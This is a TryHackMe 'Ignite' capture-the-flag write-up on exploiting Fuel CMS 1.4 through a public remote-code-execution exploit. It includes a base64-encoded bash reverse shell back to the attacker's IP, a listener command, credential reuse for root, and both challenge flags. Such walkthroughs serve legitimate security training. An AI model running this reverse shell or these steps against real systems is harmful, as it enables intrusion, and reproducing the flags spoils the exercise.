cd ../writeups

$ cat ignite-tryhackme-writeup.md

Ignite TryHackMe Writeup

> April 30, 2025 | TryHackMe

Overview

Exploiting Fuel CMS

Target Environment

Role	IP	Interface	OS	Domain	Notes
Attacker	10.17.9.93	tun0	Linux	localhost	Kali/Parrot
Victim	10.10.116.82	-	Ubuntu	ignite.thm

---

1. Reconnaissance & Initial Enumeration

Port Scanning

Identify open ports on the target:

sudo nmap --min-rate 10000 -p- 10.10.116.82
-> Output: port 80/tcp found open

Service enumeration and version discovery:

`sudo nmap -sS -sV -sC -A -T4 10.10.116.82`
  PORT   STATE SERVICE VERSION
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  | http-robots.txt: 1 disallowed entry 
  |_/fuel/
  |_http-title: Welcome to FUEL CMS

---

2. Web Enumeration

• CMS Identified: Fuel CMS 1.4
• Login Portal: http://10.10.116.82/fuel/login/
• Default Credentials Discovered:

  Username: admin
  Password: admin
  

---

3. Exploitation

Vulnerability: Fuel CMS 1.4 - Remote Code Execution (RCE)

• Exploit Sourced From:

  searchsploit fuel cms
  

  Chose exploit: /usr/share/exploitdb/exploits/php/webapps/50477.py

• Exploit Used:
  exploit2.py (see included file for script details).

• Modification for Reverse Shell:
  The payload in the script was set as:

  cmd = "echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMC4xNy45LjkzLzQ0NDQgMD4mMQ== | base64 -d | bash"
  

  This decodes and executes a bash reverse shell.

Command Execution

• Run exploit:

  python3 exploit2.py -u http://10.10.116.82
  

• Set up listener on attacker machine:

  rlwrap ncat -nvlp 4444
  

• Stabilize the shell:
  • After connection, press Ctrl+Z to background the shell.
  • Enter:

    stty raw -echo && fg
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    

---

4. Post-Exploitation

User Flag

• Location: /home/www-data/flag.txt
• Command:

  cat /home/www-data/flag.txt
  

• Flag:

  6470e394cbf6dab6a91682cc8585059b
  

---

5. Privilege Escalation

• Discovered Credentials:
  • File: fuel/application/config/database.php
  • Extracted root credentials from the Fuel CMS config.
• Switch to root:

  su root
  

• Root Flag Location: /root/root.txt

  cat /root/root.txt
  

• Flag:

  b9bbcb33e11b80be759c4e844862482d
  

---

6. Summary

• Initial Foothold: Default Fuel CMS credentials (admin:admin).
• Remote Code Execution: Via public exploit (CVE-2018-16763).
• Shell Stabilization: PTY and terminal handling for interactive shell.
• Privilege Escalation: Re-use of CMS credentials for root access.
• Flags Captured: User and root.

---

Appendix

Exploit Code Used

See exploit2.py for the actual exploit script.

Previous cd ../writeups Next